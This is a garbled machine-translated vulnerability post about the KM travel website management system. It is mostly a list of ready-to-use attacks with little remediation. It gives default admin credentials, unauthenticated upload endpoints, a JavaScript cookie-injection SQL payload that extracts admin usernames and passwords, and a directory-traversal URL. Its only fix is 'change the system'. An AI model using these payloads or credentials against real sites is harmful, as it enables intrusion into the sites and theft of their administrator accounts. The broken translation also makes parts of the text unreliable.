KM travel website management system: more than 3.0 mental retardation vulnerabilities and repair

By: Mr. DzY
KM travel website management system is the latest development of a tourism industry website management system, effectively help you build a tourism e-commerce website. The system includes the article publishing module, hotel module, air ticket module, travel and vacation module, scenic spot module, image module, travel mall module, member module, reservation and order processing module, and information collection. module, more meet your needs!

Default background: admin
Default Account: admin admin888

Vulnerability file: Under the admin directory,
Upfile. asp upload_pic.asp upfile_pic.asp data. asp has not been used as a verification file ......

1. Upload Vulnerability
Http://www.bkjia.com/admin/upfile.asp
Http://www.bkjia.com/admin/Upfile_pic.asp? Mytype =

Submit the tool. You can also create a local page for remote submission.

2. cookie Injection

For example:
Http://www.bkjia.com/line/show.asp? Id = 2

EXP:
Javascript: alert (document. cookie = "id =" + escape ("2 and 1 = 2 union select 1, userid, 3, 4, 5, 6, userpsw, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 from admin "));

3. No Management page upload for ewebeditor
Http://www.bkjia.com/admin/Oledit/admin_style.asp

4. Other information leakage
Http://www.bkjia.com/admin/data.asp
Http://www.bkjia.com/admin/Oledit/admin_PreviousFile.asp? Id = 1 & dir = ../..

We can see that we are no longer interested in looking at it.

Summary: this system is rare, and it is really completely invisible. There are quite a few people using it, and it's a big headache !!!

Fix: Change the system